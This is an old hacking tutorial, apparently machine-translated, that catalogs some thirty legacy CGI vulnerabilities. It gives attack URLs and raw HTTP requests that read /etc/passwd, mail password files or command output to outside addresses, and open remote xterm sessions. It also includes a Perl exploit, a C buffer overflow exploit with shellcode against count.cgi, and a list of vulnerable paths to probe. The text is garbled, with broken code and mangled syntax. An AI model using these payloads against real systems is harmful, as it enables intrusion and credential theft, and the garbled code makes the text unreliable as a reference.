I. PHF Vulnerability
This PHF loophole seems to be the most classic, almost all articles will be introduced, you can execute the server commands, such as display
/ETC/PASSWD:
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/PHF?QALIAS=X%0A/BIN/CAT%20/ETC/PASSWD
But can we still find it?
Two. php.cgi 2.0beta10 or earlier version of the vulnerability
All files that can read nobody permissions.
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/PHP.CGI?/ETC/PASSWD
PHP.CGI version 2.1 can only read shtml files. For the password file, comrades should be aware that perhaps in
/etc/master.passwd
/ETC/SECURITY/PASSWD and so on.
Three. whois_raw.cgi
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/WHOIS_RAW.CGI?FQDN=%0ACAT%20/ETC/PASSWD
Lynx Http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter
m%20-display%20graziella.lame.org:0
Four. Faxsurvey
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/FAXSURVEY?/BIN/CAT%20/ETC/PASSWD
Five. textcounter.pl
If there is a textcounter.pl on the server, everyone can execute commands with the privileges of the HTTP daemon.
#!/usr/bin/perl
$URL = ' http://dtp.kappa.ro/a/test.shtml '; # please _do_ _modify_ this
$EMAIL = ' pdoru@pop3.kappa.ro,root '; # please _do_ _modify_ this
if ($ARGV [0]) {$CMD = $ARGV [0];} else{
$CMD = "(PS ax;cd ...; CD ... CD ... CD Etc;cat hosts;set) \|mail ${email}-sanothe
Re_one ";
} $text = "${url}/;ifs=\8;${cmd};echo|"; $text =~ s//\$\{ifs\}/g; #print "$text \
n ";
System ({"wget"} "wget", $text, "-o/dev/null");
System ({"wget"} "wget", $text, "-o/dev/null");
#system ({"Lynx"} "Lynx", $text); #如果没有wget命令也可以用lynx
#system ({"Lynx"} "Lynx", $text);
Six. Info2www vulnerabilities in some versions (1.1)
$ request_method=get./info2www ' (.. /.. /.. /.. /.. /.. /.. /bin/mail Jami asswd|) '
$
You have new mail.
$
I don't quite understand it,:(.
Seven. pfdispaly.cgi
Lynx-source \
' HTTP://WWW.VICTIM.COM/CGI-BIN/PFDISPALY.CGI?/../../../../ETC/MOTD '
Pfdisplay.cgi there's another loophole to execute the command.
Lynx-dump http://www.victim.com/cgi-bin/pfdispaly.cgi? '%0 A/bin/uname%20-a| '
Or
Lynx-dump \
Http://victim/cgi-bin/pfdispaly.cgi? '%0 A/usr/bin/x11/xclock%20-display%20evi
L:0.0| '
Eight. Wrap
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/WRAP?/../../../../../ETC
Nine. Www-sql
Can let you read some restricted pages such as:
Enter in your browser: http://your.server/protected/something.html:
be required to enter account number and password. And there's no need for Www-sql:
Http://your.server/cgi-bin/www-sql/protected/something.html:
10. View-source
Lynx Http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/pass
Wd
11. Campas
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/CAMPAS?%0ACAT%0A/ETC/PASSWD%0A
12. Webgais
Telnet www.victim.com 80
Post/cgi-bin/webgais http/1.0
CONTENT-LENGTH:85 (replace this and the actual length of the "exploit" line
)
Query= '; mail+drazvan\ @pop3. kappa.roparagraph
13. Websendmail
Telnet www.victim.com 80
Post/cgi-bin/websendmail http/1.0
Content-length:xxx (should is replaced with the actual length of the
String passed to the server, in this case xxx=90)
Receiver=;mail+your_address\ @somewhere. Orgubject=a&content=a
14. Handler
Telnet www.victim.com 80
Get/cgi-bin/handler/useless_shit;cat/etc/passwd|? data=downloadhttp/1.0
Or
Get/cgi-bin/handler/blah;xwsh-display Yourhost.com|?data=download
Or
get/cgi-bin/handler/;xterm-displaydanish:0-e/bin/s
H|? Data=download
Note that after the cat is the TAB key instead of the space, the server reports that Useless_shit cannot be opened, but still executes the following life
Make.
15. test-cgi
Lynx Http://www.victim.com/cgi-bin/test-cgi?\whatever
cgi/1.0 test Script:
ARGC is 0. ARGV is.
Server_software = ncsa/1.4b
server_name = victim.com
Gateway_interface = cgi/1.1
Server_protocol = http/1.0
Server_port = 80
Request_method = Get
Http_accept = Text/plain, application/x-html, application/html,
Text/html, text/x-html
Path_info =
path_translated =
Script_name =/cgi-bin/test-cgi
Query_string = whatever
Remote_host = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
Remote_user =
Auth_type =
Content_Type =
Content_length =
Get some HTTP directories
Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/TEST-CGI?\HELP&0A/BIN/CAT%20/ETC/PASSWD
The trick doesn't seem to work.:(
Lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
You can also try this.
get/cgi-bin/test-cgi?* http/1.0
Get/cgi-bin/test-cgi?x *
get/cgi-bin/nph-test-cgi?* http/1.0
Get/cgi-bin/nph-test-cgi?x *
Get/cgi-bin/test-cgi?x http/1.0 *
Get/cgi-bin/nph-test-cgi?x http/1.0 *
16. For some BSD Apache you can:
Lynx HTTP://WWW.VICTIM.COM/ROOT/ETC/PASSWD
Lynx HTTP://WWW.VICTIM.COM/~ROOT/ETC/PASSWD
17. Htmlscript
Lynx Http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
18. jj.c
The demo CGI program JJ.C calls/bin/mail without filtering user
Input, so no program based on JJ.C could potentially is exploited by
Simply adding a followed by a Unix command. It may require a
Password, but two known passwords include Httpdrocks and sdgrocks. If
Can retrieve a copy of the compiled program running strings on it
Would probably reveil the password.
Do a web search in jj.c to get a copy and study the code yourself if
You are have more questions.
Nineteen. Frontpage Extensions
If you read http://www.victim.com/_vti_inf.html, you'll get the FP extensions version.
And the path it has on the server. There are also some password files such as:
Http://www.victim.com/_vti_pvt/service.pwd
Http://www.victim.com/_vti_pvt/users.pwd
Http://www.victim.com/_vti_pvt/authors.pwd
Http://www.victim.com/_vti_pvt/administrators.pwd
Twenty. Freestats.com CGI
Never met, feel some places can not be mistaken, so directly affixed to English.
John Carlton found following. He developed a exploit for the
Free web Stats services offered at Freestats.com, and supplied the
Webmaster with proper code to patch the bug.
Start a account with freestats.com, and log in. Click on the
Area so says "Click here to EDIT YOUR USER profile & COUNTER
INFO "This'll call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
Open it with Notepad. The only form
Hidden attribute on the form element of your account number.
Change this from
*input Type=hidden Name=account value=your#*
To
*input type=text name=account value= "" *
Save your page and load it into your browser. Their would now be a
Text input box where the hidden element was before. Simply Type A
# in and push the ' Click here to update ' user profile ' and all '
Information that appears on your screens has now been written to
That's user profile.
But that isn ' t the worst of it. By using frames (2 frames, one to
Hold this page to just made, and one as a target for the form
Submission) You could change the password to all of their accounts
With a simple JavaScript function.
Deep inside the Web site authors still have the good old "edit.pl"
Script. It takes some time to reach it (unlike the path described)
But can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
21st. Vulnerability in Glimpse HTTP
Telnet target.machine.com 80
get/cgi-bin/aglimpse/80| ifs=5; Cmd=5mail5fyodor\ @dhp. Com\md;echo
http/1.0
22. count.cgi
This program is only valid for the following versions of COUNT.CGI 24:
/*### count.c ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
* Forwards * *
unsigned long getsp (int);
int usage (char *);
void doit (char *,long, char *);
* Constants * *
Char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\X04\X8D\X56\X31\X89\X56\X08\X8D\X56\X3A\X89\X56\X0C\X8D\X56\X10"
"\X89\X46\X10\XB0\X0B\XCD\X80\X31\XDB\X89\XD8\X40\XCD\X80\XE8\XBF"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/x11r6/bin/xterm0-ut0-display0";
Char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int main (int argc, char *argv[]) {
char *shellcode = NULL;
int Cnt,ver,retcount, Dispnum,dotquads[4],offset;
unsigned long SP;
Char dispname[255];
Char *host;
offset = SP = CNT = ver = 0;
fprintf (stderr, "\t%s-gus\n", argv[0]);
if (argc<3) usage (argv[0]);
while (cnt = getopt (ARGC,ARGV, "H:d:v:o:")!= EOF) {
Switch (CNT) {
Case ' H ':
host = Optarg;
Break
Case ' d ':
{
Retcount = sscanf (Optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&DOTQUADS[1],
&DOTQUADS[2],
&DOTQUADS[3], &dispnum);
if (Retcount!= 5) Usage (argv[0));
sprintf (Dispname, "%03d.%0 3d.%0 3d.%0 3d:%01d ",
Dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
Shellcode=malloc (strlen (char *) optarg) +strlen (shell) +strlen (Endpad));
sprintf (Shellcode, "%s%s%s", Shell,dispname,endpad);
}
Break
Case ' V ':
ver = atoi (optarg);
Break
Case ' O ':
offset = atoi (OPTARG);
Break
Default
Usage (argv[0]);
Break
}
}
SP = offset + GETSP (ver);
(void) doit (host,sp,shellcode);
Exit (0);
}
unsigned long getsp (int ver) {
/* Get the stack pointer we should to be using. YMMV. If It does not work,
Try Using-o x, where x is between-1500 and 1500 * *
unsigned long sp=0;
if (ver = =) sp = 0xbfffea50;
if (ver = =) sp = 0xbfffea50;
if (ver = =) sp = 0XBFFFEAB4;
if (ver = =) sp = 0xbfffee38; * Dunno about this one *
if (sp = 0) {
fprintf (stderr, "I don ' t have an SP for" version try using the-o option.)
\ n ");
fprintf (stderr, "versions above are patched for this bug.\n");
Exit (1);
} else {
return SP;
}
}
int usage (char *name) {
fprintf (stderr, "\tusage:%s-h host-d-v [-O]\n
", name);
fprintf (stderr, "\te.g.%s-h www.foo.bar-d 127.0.0.1:0-v 22\n", name);
Exit (1);
}
int Openhost (char *host, int port) {
int sock;
struct Hostent *he;
struct sockaddr_in sa;
he = gethostbyname (host);
if (he = NULL) {
Perror ("Bad hostname\n");
Exit (-1);
}
memcpy (&sa.sin_addr, he->h_addr, he->h_length);
Sa.sin_port=htons (port);
Sa.sin_family=af_inet;
Sock=socket (af_inet,sock_stream,0);
if (Sock < 0) {
Perror ("Cannot open socket");
Exit (-1);
}
Bzero (&sa.sin_zero,sizeof (Sa.sin_zero));
if (Connect (sock, (struct sockaddr *) &sa,sizeof sa) <0) {
Perror ("Cannot connect to host");
Exit (-1);
}
return (sock);
}
void doit (char *host,long sp, char *shellcode) {
int cnt,sock;
Char qs[7000];
int bufsize = 16;
Char Buf[bufsize];
Char chain[] = "User=a";
Bzero (BUF);
for (cnt=0;cnt<4104;cnt+=4) {
QS[CNT+0] = sp & 0x000000ff;
Qs[cnt+1] = (sp & 0x0000ff00) >> 8;
QS[CNT+2] = (sp & 0x00ff0000) >> 16;
QS[CNT+3] = (sp & 0xff000000) >> 24;
}
strcpy (Qs,chain);
Qs[strlen (chain)]=0x90;
qs[4104]= sp&0x000000ff;
qs[4105]= (SP&0X0000FF00) >>8;
qs[4106]= (sp&0x00ff0000) >>16;
qs[4107]= (sp&0xff000000) >>24;
qs[4108]= sp&0x000000ff;
qs[4109]= (SP&0X0000FF00) >>8;
qs[4110]= (sp&0x00ff0000) >>16;
qs[4111]= (sp&0xff000000) >>24;
qs[4112]= sp&0x000000ff;
qs[4113]= (SP&0X0000FF00) >>8;
qs[4114]= (sp&0x00ff0000) >>16;
qs[4115]= (sp&0xff000000) >>24;
qs[4116]= sp&0x000000ff;
qs[4117]= (SP&0X0000FF00) >>8;
qs[4118]= (sp&0x00ff0000) >>16;
qs[4119]= (sp&0xff000000) >>24;
qs[4120]= sp&0x000000ff;
qs[4121]= (SP&0X0000FF00) >>8;
qs[4122]= (sp&0x00ff0000) >>16;
qs[4123]= (sp&0xff000000) >>24;
qs[4124]= sp&0x000000ff;
qs[4125]= (SP&0X0000FF00) >>8;
qs[4126]= (sp&0x00ff0000) >>16;
qs[4127]= (sp&0xff000000) >>24;
qs[4128]= sp&0x000000ff;
qs[4129]= (SP&0X0000FF00) >>8;
qs[4130]= (sp&0x00ff0000) >>16;
qs[4131]= (sp&0xff000000) >>24;
strcpy ((char*) &qs[4132],shellcode);
Sock = Openhost (host,80);
Write (sock, "get/cgi-bin/count.cgi", 23);
Write (Sock,qs,strlen (QS));
Write (sock, "http/1.0\n", 10);
Write (sock, "User-agent:", 12);
Write (Sock,qs,strlen (QS));
Write (sock, "\ n", 2);
Sleep (1);
/* printf ("get/cgi-bin/count.cgi?%s http/1.0\nuser-agent:%s\n\n", Qs,qs); *
/
/*
Setenv ("Http_user_agent", qs,1);
Setenv ("Query_string", qs,1);
System ("./count.cgi");
*/
}
Look at pictures with count.cgi
Http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=.. /.. /.. /.. /.
./.. /path_to_gif/file.gif
23. finger.cgi
Lynx Http://www.victim.com/cgi-bin/finger? @localhost
Get the username that landed on the host.
24. man.sh
Robert Moniot found Followung. The May 1998 issue of the SysAdmin
Magazine contains an article, "Web-enabled Mans Pages", which
Includes source code for very nice CGI script named man.sh to feed
Mans pages to a Web browser. The hypertext links to other Mans
Pages are an especially attractive feature.
Unfortunately, this script are vulnerable to attack. Essentially,
Anyone who can execute the CGI thru their Web browser can run any
System commands with the user ID of the Web server and obtain the
Output from them in a Web page.
25. formhandler.cgi
Add it to the table.
There's/etc/passwd in your mailbox.
26. Jfs
I believe that everyone has read the "JFS intrusion Pcweek-linux Mainframe Detailed process" This article, he used Photoads
This CGI module hacked into the mainframe. I did not actually attack, read the article understanding is this
First Lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31
337&action=done&country=lala&city=lele&state=a&email=lala@hjere.com&name=%0a
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111 1111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111 111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111 1111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111 111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111 11111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111 111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111 11111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111 111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111 111111111111111111111111111&phone=1
1&subject=la&password=0&citystphone=0&renewed=0 "
Create a new ad value to bypass the $AdNum after checking
Lynx ' http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jp
g&adnum=11111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111 111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111 11111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111 111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111 11111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111 1111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111 11111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111 1111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111&datafile=1&password=0&fil
E_content=%00%00%00%00%00%00%00%00%00%00%00%00%00&file_name=/lala/\.. /.. /.. /
.. /.. /.. /.. /home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif '
Create/overwrite any files that the user nobody has permission to write.
I do not know whether the right, in its zip bag I can not find the To_url script, I do not know which comrades know?
27. Backdoor
See now some cgichk.c have checked Trojan unlg1.1 and rwwwshell.pl
The former one is written by UNLG, I have not seen the source code, there is a THC written, Packetstorm has its 1.6 version of the source code.
28. Visadmin.exe
Http://omni.server/cgi-bin/visadmin.exe?user=guest
This command is going to keep writing to the server's hard drive until it is full.
29. Campas
> Telnet www.xxxx.net 80
Trying 200.xx.xx.xx ...
Connected to Venus.xxxx.net
Escape character is ' ^] '.
get/cgi-bin/campas?%0 acat%0a/etc/passwd%0a
Root:x:0:1:super-user:/export/home/root:/sbin/sh
daemon:x:1:1::/:
Bin:x:2:2::/usr/bin:
sys:x:3:3::/:
Adm:x:4:4:admin:/var/adm:
Lp:x:71:8:line Printer ADMIN:/USR/SPOOL/LP:
Smtp:x:0:0:mail Daemon User:/:/bin/false
.... Now you know what to do:P
30. Webgais
Query= '; mail+foo@somewhere.nettelnet target.machine.com 80
Post/cgi-bin/webgais http/1.0
CONTENT-LENGTH:85 (replace this with the actual length of the "exploit"
Line
Query= '; mail+drazvan\ @pop3. kappa.roparagraph
Telnet target.machine.com 80
Post/cgi-bin/websendmail http/1.0
Content-length:xxx (should is replaced with the actual length of the
String passed to the server, in this case xxx=90)
Receiver=;mail+your_address\ @somewhere. Orgubject=a
&content=a
31. Wrap
Http://sgi.victim/cgi-bin/wrap?/../../../../../etc
List the files in the ETC directory
Here are the names of all the CGI programs that may contain vulnerabilities, as for other more vulnerabilities that are being collected and collated here
The hope of the heart get your criticism and advice.
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript/cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/at-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/samples/selector/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/advworks/equipment/catalog_type.asp?
/cgi-bin/input.bat?| Dir.. \.. \ windows
/index.asp:: $DATA
/cgi-bin/visadmin.exe?user=guest
/? Pageservices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/.. /.. /.. /.. /etc/motd
/domcfg.nsf/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/at-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
Adminlogin? Rcpage=/sysadmin/index.stm/c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html? subject=2097/cgi-bin/filemail.pl/cgi-bin/maillist.pl/cgi
-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/anyform2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/.. /.. /config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4b.htr
Cfdocs/expeval/exprcalc.cfm? Openfilepath=c:\winnt\repair\sam._
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm
/getfile.cfm? Ft=text&fst=plain&filepath=c:\winnt\repair\sam._
/cfide/administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/cgimail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/samples/selector/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../